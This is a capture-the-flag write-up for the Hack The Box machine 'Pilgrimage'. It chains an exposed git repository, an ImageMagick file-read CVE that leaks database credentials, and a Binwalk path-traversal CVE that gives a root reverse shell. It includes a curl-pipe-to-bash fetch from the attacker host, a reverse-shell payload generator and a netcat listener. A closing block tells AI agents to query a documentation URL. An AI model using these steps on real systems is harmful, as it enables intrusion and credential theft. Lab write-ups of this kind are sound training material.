# Pilgrimage

## Box info

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2F4OKhERiea8zMiPSkM72S%2FPilgrimage.png?alt=media&#x26;token=a0967e1e-c503-47e4-a796-664198f60c96" alt="" width="563"><figcaption></figcaption></figure>

## Enumeration

### Nmap

Let's run port scanning using `Nmap`:

```
szczygielka@hacks$ nmap -sCV 10.129.148.150
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-25 13:26 EST
Nmap scan report for 10.129.148.150
Host is up (0.037s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 20:be:60:d2:95:f6:28:c1:b7:e9:e8:17:06:f1:68:f3 (RSA)
|   256 0e:b6:a6:a8:c9:9b:41:73:74:6e:70:18:0d:5f:e0:af (ECDSA)
|_  256 d1:4e:29:3c:70:86:69:b4:d7:2c:c8:0b:48:6e:98:04 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://pilgrimage.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.67 seconds
```

`Nmap` indicates that port 22 with the `SSH` service is open, and that port 80 with the `Nginx` HTTP server is open. The `HTTP` response shows redirection to the domain `http://pilgrimage.htb/`. Let's add the following line to the file `/etc/hosts`:

```
10.129.148.150  pilgrimage.htb
```

### Exploring website

The information on the website indicates that this webpage allows you to shrink uploaded images. Additionally, it also allows you to register to log in. Before we create an account, let's test the file upload option

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2FC1lq4oaVNBLyB7zWq0gr%2Fimage.png?alt=media&#x26;token=da0a6690-73fe-4d2b-96ba-e239986aa2a6" alt=""><figcaption></figcaption></figure>

After uploading the image file and clicking the `Shrink` button, we receive a link where we can get the shrunken image:

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2F9SU592iMzgrtHscP6lBH%2Fimage.png?alt=media&#x26;token=bd68086e-89a0-401f-b905-3c33a12beb14" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2FMMTjaDWKO28yCsX0EE2B%2Fimage.png?alt=media&#x26;token=b375f293-3d36-4f5b-86d3-e952e4568f66" alt=""><figcaption></figcaption></figure>

After creating an account and logging in, we only get a dashboard with information about the files we have uploaded and shrunken:

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2Fp4F50E62Jkdy2TchQtkJ%2Fimage.png?alt=media&#x26;token=1c76a819-f584-4ab5-a5c3-d9e87aa2c2da" alt=""><figcaption></figcaption></figure>

### **Directory Brute Force**

Let's use the `Gobuster` to enumerate hidden directories and files:

```
szczygielka@hacks$ gobuster dir -u http://pilgrimage.htb/ -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://pilgrimage.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 153]
/.htaccess            (Status: 403) [Size: 153]
/.git/HEAD            (Status: 200) [Size: 23]
/.htpasswd            (Status: 403) [Size: 153]
/assets               (Status: 301) [Size: 169] [--> http://pilgrimage.htb/assets/]
/index.php            (Status: 200) [Size: 7621]
/tmp                  (Status: 301) [Size: 169] [--> http://pilgrimage.htb/tmp/]
/vendor               (Status: 301) [Size: 169] [--> http://pilgrimage.htb/vendor/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

```

The information returned by the `Gobuster` shows that there is a `.git` directory in which the `HEAD` file is located. The ability to access the contents of the `HEAD` file indicates that we probably have access to the entire git repository. Additionally, a status code `200` for the query regarding `/index.php` proves that this website uses PHP.

Let's try to clone the git repository to our attack machine:

```
szczygielka@hacks$ git clone 10.129.148.150:80/.git
Cloning into '10.129.148.150'...
szczygielka@10.129.148.150's password:
```

An attempt to download the repository fails because we are asked for a password that we do not know. Let's look for another option that would allow us to dump the contents of the repository. Internet search results indicate that the `git-dumper` tool may enable us to do this:

{% embed url="<https://github.com/arthaud/git-dumper>" %}

Let's install the contents of `git-dumper` repository:

```
szczygielka@hacks$ sudo -H pip install git-dumper
```

Let's execute the following command to download the contents of the repository to a catalog called `pilgrimage`:

```
szczygielka@hacks$ git-dumper http://pilgrimage.htb/.git ./pilgrimage
[-] Testing http://pilgrimage.htb/.git/HEAD [200]
[-] Testing http://pilgrimage.htb/.git/ [403]
[-] Fetching common files
[-] Fetching http://pilgrimage.htb/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://pilgrimage.htb/.gitignore [404]
[-] http://pilgrimage.htb/.gitignore responded with status code 404
[-] Fetching http://pilgrimage.htb/.git/description [200]
[-] Fetching http://pilgrimage.htb/.git/hooks/post-receive.sample [404]
[-] Fetching http://pilgrimage.htb/.git/hooks/commit-msg.sample [200]
[-] http://pilgrimage.htb/.git/hooks/post-receive.sample responded with status code 404
[-] Fetching http://pilgrimage.htb/.git/hooks/post-commit.sample [404]
[-] http://pilgrimage.htb/.git/hooks/post-commit.sample responded with status code 404
[-] Fetching http://pilgrimage.htb/.git/COMMIT_EDITMSG [200]
[-] Fetching http://pilgrimage.htb/.git/hooks/post-update.sample [200]
[-] Fetching http://pilgrimage.htb/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://pilgrimage.htb/.git/hooks/pre-commit.sample [200]
[-] Fetching http://pilgrimage.htb/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://pilgrimage.htb/.git/hooks/update.sample [200]
<SNIP>
```

The contents of the repository show that it mainly contains source codes in PHP and assets:

```
szczygielka@hacks$ ls -l
total 26960
drwxr-xr-x 6 szczygielka szczygielka     4096 Feb 25 17:17 assets
-rwxr-xr-x 1 szczygielka szczygielka     5538 Feb 25 17:17 dashboard.php
-rwxr-xr-x 1 szczygielka szczygielka     9250 Feb 25 17:17 index.php
-rwxr-xr-x 1 szczygielka szczygielka     6822 Feb 25 17:17 login.php
-rwxr-xr-x 1 szczygielka szczygielka       98 Feb 25 17:17 logout.php
-rwxr-xr-x 1 szczygielka szczygielka 27555008 Feb 25 17:17 magick
-rwxr-xr-x 1 szczygielka szczygielka     6836 Feb 25 17:17 register.php
drwxr-xr-x 4 szczygielka szczygielka     4096 Feb 25 17:17 vendor
```

There is also a binary in this repository called `magick`. We can check its version using the following command:

```
szczygielka@hacks$ ./magick -version
Version: ImageMagick 7.1.0-49 beta Q16-HDRI x86_64 c243c9281:20220911 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5) 
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (7.5)
```

From the information available on [GitHub](https://github.com/ImageMagick/ImageMagick) we know that `ImageMagick` is a free open-source software for displaying, converting, and editing (including shrinking) raster image and vector image files. The content of the source code in the `index.php` file shows that this software is used to shrink the image:

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2FhIpvnkcYSEL2hrTVpxpc%2Fimage.png?alt=media&#x26;token=8a384826-7406-4dea-b539-11fa033c5d89" alt=""><figcaption></figcaption></figure>

This code snippet also shows that an SQLite database is used and is created from the `/var/db/pilgrimage` file. Due to the fact we have the version of the ImageMagick software used, let's check if there are any vulnerabilities in this software.&#x20;

### CVE-2022-44268

Vulnerability search results for `ImageMagick 7.1.0-49` indicate a vulnerability classified as [CVE-2022-44268](https://nvd.nist.gov/vuln/detail/CVE-2022-44268), which leads to an arbitrary file read. From the article describing this vulnerability, available [here](https://www.metabaseq.com/imagemagick-zero-days/), we learn that:

> A malicious actor could craft a PNG or use an existing one and add a textual chunk type (e.g., tEXt). These types have a keyword and a text string. If the keyword is the string “profile” (without quotes) then ImageMagick will interpret the text string as a filename and will load the content as a raw profile, then the attacker can download the resized image which will come with the content of a remote file.

The cited article also indicated that the possibility of embedding an arbitrary file in a PNG file depends on whether binary magick has the right to read it.&#x20;

## Exploitation

Since we know the location of the file storing the database (`/var/db/pilgrimage`), we would like to download its contents. This exploit should allow us to prepare a malicious PNG file, which should allow us to get file content:

{% embed url="<https://github.com/Sybil-Scan/imagemagick-lfi-poc>" %}

Let's download the `generate.py` script from the repository. We can generate a `malicious.png` image via the following command:

```
szczygielka@hacks$ python3 generate.py -f "/var/db/pilgrimage" -o malicious.png

   [>] ImageMagick LFI PoC - by Sybil Scan Research <research@sybilscan.com>
   [>] Generating Blank PNG
   [>] Blank PNG generated
   [>] Placing Payload to read /var/db/pilgrimage
   [>] PoC PNG generated > malicious.png
```

In the created image we can see that a payload has been added, which can allow us to read the file from the target:&#x20;

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2FB3cFqFAkxvfWBnxCGkaY%2Fmalicious_edited.png?alt=media&#x26;token=0e60f4cc-bfa3-47c3-a032-9618ef1e63d8" alt=""><figcaption></figcaption></figure>

Now let's upload the `malicious.png` file to the website, then go to the preview of the shrunken image and download it. Let's save the shrunken image as `malicious-shrunken.png`.  The magick [documentation](https://legacy.imagemagick.org/script/identify.php) shows that the `identify` program describes the format and characteristics of the image file and using the `-verbose` option gives more information about the file. &#x20;

We will use them to obtain detailed information about the downloaded image and save it to a file `malicious_data.txt`:&#x20;

```
szczygielka@hacks$ ./magick identify -verbose malicious-shrunken.png > malicious_data.txt
```

According to the information contained in the repository, if the database file was read, its content should be in the `Raw profile type` field.  The content of this field in the `malicious_data.txt` file is not empty:

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2F1zkfc98sikZRehHKSrvc%2Fimage.png?alt=media&#x26;token=b3a97098-16fa-4aa1-929a-8dbaaaa97503" alt=""><figcaption></figcaption></figure>

Now let's try to read it. However, let's first remove the remaining fields storing information about the file, leaving only the contents of the `Raw profile type` field. The beginning of the `malicious_data.txt` file should look as follows:

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2FzOU5RZ17b989zDTpjVa6%2Fimage.png?alt=media&#x26;token=f9293a72-4db4-417c-bc1b-4159d69a67f6" alt=""><figcaption></figcaption></figure>

The data in the file is in hexadecimal `malicious_data.txt` format. So let's prepare a short script in Python that will remove the newline in the file, convert the hexadecimal format into binary, and save data in this format to the database file. The content of the prepared `hex_to_binary.py` script in Python is as follows:

```
hex_data_file = open("malicious_data.txt")
hex_data = hex_data_file.read()
hex_data = hex_data.strip()
hex_data_file.close()

binary_data = bytes.fromhex(hex_data)

database_file = open("database.sqlite", "bw")
database_file.write(binary_data)
database_file.close()
```

Then let's execute the prepared script to obtain the `pilgrimage.sqlite` file containing the database. The `file` command recognizes the `pilgrimage.sqlite` file as a `SQLite 3.x` database:

```
szczygielka@hacks$ file pilgrimage.sqlite 
pilgrimage.sqlite: SQLite 3.x database, last written using SQLite version 3034001, file counter 84, database pages 5, cookie 0x4, schema 4, UTF-8, version-valid-for 84
```

We will then open the database using `DB Browser for SQLite`.  In the `users` table we find credentials for user the user `emily`:&#x20;

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2FDzO4tRiabLdIELX2GYkw%2Fimage.png?alt=media&#x26;token=fa7df9da-c246-4d76-b004-66c2eb5c30ad" alt=""><figcaption></figcaption></figure>

Let's try to log in using these credentials via SSH:

```
szczygielka@hacks$ ssh emily@10.129.148.150
emily@10.129.148.150's password: 
Linux pilgrimage 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Feb 27 03:18:37 2024 from 10.129.148.150
```

We have successfully logged in as a user `emily`.&#x20;

### User flag

The user flag can be obtained from `/home/emily/user.txt`.&#x20;

## Privilege escalation

We will use `LinPEAS` to find possible permission escalation paths:

{% embed url="<https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS>" %}

In the repository, on the [Releases](https://github.com/carlospolop/PEASS-ng/releases/tag/20240225-d29d697a) page, you will find the `linpeas.sh` file. Let's download it to the attacking machine and then start the Python HTTP server on the selected port:

```
szczygielka@hacks$ python3 -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
```

Then, on the target machine use `curl` to download the contents of the file and execute it using the `bash` shell:

```
emily@pilgrimage:~$ curl 10.10.14.73:443/linpeas.sh | bash
```

The results returned by LinPEAS contain information about the existence of a nonstandard `malwarescan.sh` script:

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2FSGyBFUEG57Nx1nIF5KvU%2Fimage.png?alt=media&#x26;token=13b94fdf-d983-4a07-9ee2-56c84a2b2aaa" alt=""><figcaption></figcaption></figure>

This script is running as `root`:

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2FrLBQn68UIoYez7nxD2go%2Fimage.png?alt=media&#x26;token=8a7ae642-0544-43b1-b041-62c073252001" alt=""><figcaption></figcaption></figure>

Let's analyze the content of this script:

```
emily@pilgrimage:~$ cat /usr/sbin/malwarescan.sh 
#!/bin/bash

blacklist=("Executable script" "Microsoft executable")

/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
        filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
        binout="$(/usr/local/bin/binwalk -e "$filename")"
        for banned in "${blacklist[@]}"; do
                if [[ "$binout" == *"$banned"* ]]; then
                        /usr/bin/rm "$filename"
                        break
                fi
        done
done
```

This script uses `inotifywait` to check for changes to files in the `/var/www/pilgrimage.htb/shrunk/` directory. If a new file is created in this directory, its name is extracted using `tail` and `sed`. Then, information about the file is extracted using `binwalk`. If this information contains `Executable script` or `Microsoft executable` strings, this file is removed. Let's check the version of `binwalk` used on this machine:

```
emily@pilgrimage:~$ binwalk -h

Binwalk v2.3.2
Craig Heffner, ReFirmLabs
https://github.com/ReFirmLabs/binwalk
<SNIP>
```

Let's check if the returned  `binwalk` version has any vulnerabilities.&#x20;

### CVE-2022-4510

The version of Binwalk on our target appears to be vulnerable to [CVE-2022-4510](https://nvd.nist.gov/vuln/detail/CVE-2022-4510). Path traversal vulnerability exists in Binwalk `2.1.2b` to `2.3.3` version. Exploitation of this vulnerability may lead to remote code execution. This vulnerability can be exploited if `binwalk` uses the `-e` option, i.e. extraction mode.

### Exploitation

Due to the fact the `malwarescan.sh` script runs as `root` and `binwalk` with option `-e` is run in this script, when passing a malicious file to `binwalk` containing a payload enabling code execution, the code contained in this file should also be executed with `root` rights. An Internet search for how to exploit the CVE-2022-4510 vulnerability leads us to the following repository:

{% embed url="<https://github.com/adhikara13/CVE-2022-4510-WalkingPath>" %}

The code in this repository should allow us to generate a PNG image containing the reverse shell code. After uploading the malicious image to the `/var/www/pilgrimage.htb/shrunk/` directory, this file should be checked by the `malwarescan.sh` script, that is by `binwalk`. Executing the `binwalk` with the malicious image should allow us to get a reverse shell as root.

Clone the contents of the repository:

```
szczygielka@hacks$ git clone https://github.com/adhikara13/CVE-2022-4510-WalkingPath.git
Cloning into 'CVE-2022-4510-WalkingPath'...
remote: Enumerating objects: 12, done.
remote: Counting objects: 100% (12/12), done.
remote: Compressing objects: 100% (10/10), done.
remote: Total 12 (delta 3), reused 7 (delta 2), pack-reused 0
Receiving objects: 100% (12/12), 7.28 KiB | 7.28 MiB/s, done.
Resolving deltas: 100% (3/3), done.
```

Let's go to the directory containing the repository. To use the exploit, let's prepare an example PNG file, in our case it will be `penguin.png`. Then run the `walkingpath.py` script providing the `reverse` option, the prepared PNG image, the IP address of the attacking machine, and the port number on which we will listen:

```
szczygielka@hacks$ python3 walkingpath.py reverse penguin.png 10.10.14.73 443
```

After executing the script, a file `binwalk_exploit.png` should appear in this directory, containing a malicious payload that allows you to obtain a reverse shell. A payload to enable reverse shell has been added at the end of the image:

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2FSH9ZCE8PAIXMbKtL9o5e%2Fimage.png?alt=media&#x26;token=059c8344-bbce-4919-b531-4d27f9452439" alt="" width="563"><figcaption></figcaption></figure>

Let's run the listener on the port set in the malicious PNG file:

```
szczygielka@hacks$ nc -lnvp 443
listening on [any] 443 ...
```

Let's prepare the Python HTTP server for download `binwalk_exploit.png` from the attacking machine:

```
szczygielka@hacks$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
```

Then let's download the file to the target machine:

```
emily@pilgrimage:/var/www/pilgrimage.htb/shrunk$ wget 10.10.14.73:8080/binwalk_exploit.png
--2024-02-27 06:34:47--  http://10.10.14.73:8080/binwalk_exploit.png
Connecting to 10.10.14.73:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 42135 (41K) [image/png]
Saving to: ‘binwalk_exploit.png’

binwalk_exploit.png                                        100%[========================================================================================================================================>]  41.15K  --.-KB/s    in 0.07s   

2024-02-27 06:34:47 (557 KB/s) - ‘binwalk_exploit.png’ saved [42135/42135]
```

In the listener, we get a reverse shell:

```
szczygielka@hacks$ nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.73] from (UNKNOWN) [10.129.176.117] 38366
```

Let's upgrade our reverse shell:

```
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

We got a reverse shell as `root`:

```
root@pilgrimage:~/quarantine# whoami
root
```

### Root flag

The previous steps lead us to the `root` user. The root flag can be obtained at `/root/root.txt`.&#x20;


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://szczygielka.gitbook.io/writeups/hack-the-box-writeups/linux-machines/pilgrimage.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.